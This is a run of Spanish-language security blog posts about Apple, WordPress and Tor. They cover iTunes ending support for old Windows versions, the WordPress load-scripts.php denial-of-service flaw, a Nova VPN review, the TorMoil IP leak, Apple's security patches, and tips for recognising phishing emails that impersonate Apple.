“Comenzando el 25 de mayo, Apple introducirá cambios de seguridad para prevenir el uso de la tienda de iTunes en equipos con versiones antiguas de Windows. Si dispones de un equipo con Windows XP o Vista, tu PC dejará de estar mantenido por Microsoft y no puedes utilizar la última versión de iTunes. Podrás seguir utilizando versiones anteriores de iTunes pero sin el soporte de Apple. No podrás realizar compras en iTunes Store o volver a descargar contenido obtenido anteriormente.”


Figura 1:Comparativa entre las distintas generaciones de Apple TV.

Por otra parte, Apple ha asegurado que estos cambios de seguridad también afectaran a la primera generación de Apple TV. Esto no debe de suponer una gran sorpresa para los usuarios ya que en 2015 Apple declaró oficialmente obsoleta a la primera generación de este dispositivo.

“Así mismo, a partir del 25 de mayo estos cambios de seguridad prevendrán el uso de iTunes Store en Apple TV (de primera generación). Estos dispositivos son productos obsoletos de Apple y no serán actualizados para soportar estos cambios de seguridad. Después de estos cambios solo podrás acceder a la tienda de iTunes desde Apple TV de segunda generación o posteriores.” 

Todos los detalles acerca de esta actualización de seguridad pueden encontrarse en la página de soporte de Apple.

miércoles, 7 de febrero de 2018

[Wordpress] Vulnerabilidad en Wordpress abre la puerta a ataques DDoS

Sin duda un día negro en el mundo Wordpress. Ayer ha sido un día negro para los usuarios de Wordpress y es que una vulnerabilidad en el CMS puede provocar la ejecución de ataques DDoS contra tu Wordpress. Con esta noticia comenzamos una nueva sección en Seguridad Apple, en la que semanalmente iremos comentando la actualidad que rodea a Wordpress, el cual no solamente se utiliza en Linux, si no que también se puede ver en sistemas Windows y en nuestros queridos Mac.

Ahora hablaremos de la vulnerabilidad de la que todo el mundo habla esta semana. El investigador Barak Tawily descubrió una vulnerabilidad, CVE-2018-6389, en el fichero load-scripts.php, el cual puede provocar ataques de tipo DDoS contra instancias de Wordpress. Además, el aprovechamiento de la vulnerabilidad no requiere de un gran ancho de banda por parte del atacante. La vulnerabilidad afecta a versiones de Wordpress 4.9.2 y anteriores. ¿Qué hace el fichero load-scripts.php? Ayuda a los administradores de sistemas a mejorar el proceso de carga de las páginas, mediante el uso de Javascript. Es un recurso no autenticado, es decir, cualquiera puede acceder a ese recurso. 

Figura: URL para sobrecargar load-scripts.php

Para realizar el ataque, el investigador comentó que es necesario forzar a load-scripts.php para que llame a todos los ficheros Javascript posibles a la vez, pasándole los nombres como se puede ver en el ejemplo de la imagen. Esto provoca un aumento en el consumo de CPU y de la memoria RAM. El uso masivo de esta técnica puede provocar la caída del servicio. El investigador reportó la vulnerabilidad a HackerOne, aunque los desarrolladores de Wordpress han comentado que debería mitigarse a nivel de servidor. El debate está servido, pero el CVE está otorgado.

viernes, 2 de febrero de 2018

Nova VPN: Una VPN rápida, segura y fácil de usar para iPhone

No importa de dónde seas o desde que país te conectes a internet, las VPN se han convertido en una de las herramientas indispensables en la era digital. Si no quieres ser vigilado por la NSA, acceder a páginas bloqueadas por el gobierno o simplemente ver videos de YouTube que estén bloqueados en tu país, una buena VPN podría ayudarte a solucionar estos problemas. Hoy en día puede resultarnos difícil encontrar una VPN que se ajuste a nuestras necesidades, muchas de ellas son lentas, difíciles de entender o demasiado caras. A continuación vamos a presentaros Nova VPN, una de las mejores alternativas para los dispositivos Apple.

Una de las principales ventajas de Nova VPN es que es una herramienta multiplataforma, podrás utilizarla tanto en sistemas operativos de Apple como en Android o Windows, esto te permitirá utilizar una misma cuenta en todos tus dispositivos. Configurar la VPN resulta bastante sencillo, solo tendrás que suscribirte al servicio y descargar la aplicación gratuita compatible con tu dispositivo, hecho esto podrás comenzar a utilizar tu VPN pulsando el botón rojo que aparece en el menú de la herramienta, pasados unos segundos el color del botón cambiará a verde, lo que significa que la aplicación ya está funcionando correctamente. Con Nova podrás seleccionar la ubicación favorita para tu VPN pulsando en “cambiar de servidor” o seleccionar manualmente el país del que venga tu conexión pulsando “Ayúdame a elegir”.


Figura 1: Menú de Nova VPN.

La aplicación hace que la selección de servidores sea súper sencilla mostrándote los mejores servidores para ti, servidores P2P, tus servidores favoritos y una lista de países entre los que escoger. A la hora de elegir una VPN los usuarios a parte de la seguridad buscan velocidad, este es uno de los puntos fuertes de Nova VPN, podrás navegar con fluidez e incluso ver videos en streaming sin darte cuenta de que estas utilizando una VPN. En cuanto al precio de Nova VPN, puede parecer un poco elevado en comparación con otras alternativas, pero resulta ser razonable para la calidad de los servicios que ofrece. A la hora de adquirir Nova VPN podrás escoger entre tres planes.

lunes, 6 de noviembre de 2017

Vulnerabilidad en Tor Browser para macOS filtra tu dirección IP

Una de las noticias del mes en el mundo de la seguridad. Se ha descubierto que los usuarios de Mac y Linux que utilicen Tor Browser podrían estar revelando las direcciones IP sin ellos darse cuenta. Todo esto está debido a una vulnerabilidad crítica que filtraría esta información. La privacidad del usuario quedaría, en este caso, reducida, prácticamente, a la nada. El investigador Filippo Cavallarin ha sido la persona que ha descubierto la vulnerabilidad, la cual es una vulnerabilidad del navegador Firefox. Como Tor Browser utiliza el núcleo de Firefox, también se ve afectado. 

El investigador ha denominado a la vulnerabilidad como TorMoil, afecta a los navegadores que se ejecuten en macOS y en Linux, pero no en sistemas Windows. Los detalles técnicos no han sido revelados. Los desarrolladores de Tor han sido notificados para poder solventar el error lo antes posible. Se ha liberado una nueva versión del navegador Tor Browser 7.0.9 para los usuarios afectados y corrige este fallo de seguridad.

Figura 1: Tor Browser y su actualización 7.0.9

Como mencionábamos antes, es una de las noticias del mes en el mundo de la seguridad y parece que ha generado una gran alerta para los usuarios que quieren aprovechar su navegación anónima. TorMoil se activa cuando un usuario hace clic en direcciones que comienzan por "file://", por lo que habría que tenerlo en cuenta en caso de utilizar el navegador, aunque la mejor solución es actualizar a la nueva versión que se ha publicado del navegador, la versión 7.0.9 de Tor Browser.

jueves, 21 de septiembre de 2017

La puesta en marcha de las nuevas generaciones: Apple renueva todo

Ayer comentábamos la esperada salida de iOS 11 y hoy hablaremos de todo lo demás. Apple no solo ha liberado a iOS 11, si no que ha liberado todo. Todo lo que hemos estado esperando en los últimos meses. Las betas que hemos ido viendo a lo largo de los meses en el Apple Watch, Apple TV, Mac, etcétera, ya son una realidad. Además, como cada nueva liberación de sistema operativo, éste viene acompañado de la necesidad de actualizar por fallos de seguridad conocidos y puestos en conocimiento a Apple.

Apple ha publicado actualizaciones de seguridad y boletines para 6 productos como son: XCode 9, tvOS 11, watchOS 4, Safari 11, iOS 11 e iTunes 12.7 para MacOS como Windows. A continuación vamos a ver la problemática real y el número de parches que se aplicaban en cada producto.
Figura 1: Actualización a iOS 11

Los detalles aún no publicados lo serán pronto, por lo que en poco tiempo se podrá consultar en el sitio web de Apple estos detalles. Respecto a macOS, tendremos que esperar. Apple lanzará macOS High Sierra 10.13, el próximo 25 de septiembre, y se espera que la compañía reúna todos los parches de seguridad con la versión principal de 10.13. Visto lo visto, los equipos de IT tienen un gran trabajo para tener todo actualizado y al día. No dejes para mañana lo que puedas hacer hoy.

sábado, 16 de septiembre de 2017

Nueva oleada de estafas con usuarios de Apple como objetivo

A pesar de que la mayoría de ataques vayan dirigidos a sistemas Windows y Android los usuarios de Apple no deben bajar la guardia. No es la primera vez que desde Seguridad Apple os avisamos de lo peligrosas que son algunas de estas estafas. Las estafas de Phishing tratan de convencer y engañar al usuario para que este facilite sus datos y contraseñas a través de una dirección de correo o una página web engañosa. En este caso alguien supuestamente del servicio de soporte de Apple contacta contigo (normalmente vía e-mail) para avisarte de que tu Apple ID ha sido hackeada. Estos estafadores hacen creer a las víctimas que pueden tener serias consecuencias si no arreglan el problema de inmediato.

La principal pista para ver que un mensaje de este tipo no proviene de Apple es fijarse en la información que te piden, si se te pregunta por usuario, contraseña, número de la tarjeta de crédito, número de la seguridad social o alguna otra información personal ignóralo ya que son datos que Apple nunca solicita. Al facilitar estos datos a los estafadores ellos pueden acceder fácilmente a la información que tengas guardada en los servidores de Apple (desde e-mails hasta compras en iTunes). Estos ataques pueden derivar en un robo de identidad o de otras cuentas, ya que muchas personas utilizan las mismas contraseñas para todo. La mejor manera de prevenir una estafa de este tipo es conocer como funcionan, a continuación os daremos una serie de consejos para no caer en este tipo de trampas.

Figura 1: Correo que suplanta a Apple.

La mejor forma para detectar un fraude, como ya hemos mencionado antes, es fijarse en si los correos o mensajes nos piden introducir información personal o bancaria, ya que Apple nunca solicita este tipo de información.

Recibir una llamada, mensaje o e-mail sin razón alguna es síntoma de que algo no va bien. Apple envía e-mails a sus usuarios únicamente cuando introducen sus credenciales en un nuevo dispositivo y los agentes de soporte de Apple no contactarán contigo a no ser que sea para responderte una consulta que hayas efectuado previamente.

Si recibes un mensaje cuyo origen parece extraño o que te avise de las consecuencias perjudiciales que pueda tener no hacer algo de inmediato (como entrar en un link o cambiar tu contraseña) no le hagas caso.

Por último, es importante notificar a Apple cuando sospechemos que están intentando estafarnos, esto lo podremos hacer desde su página oficial, al igual que cualquier otra gestión de nuestra cuenta, desde cambiar la contraseña hasta activar un segundo factor de autenticación, algo que es muy recomendable y que puede paliar los daños causados por un robo de credenciales.

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares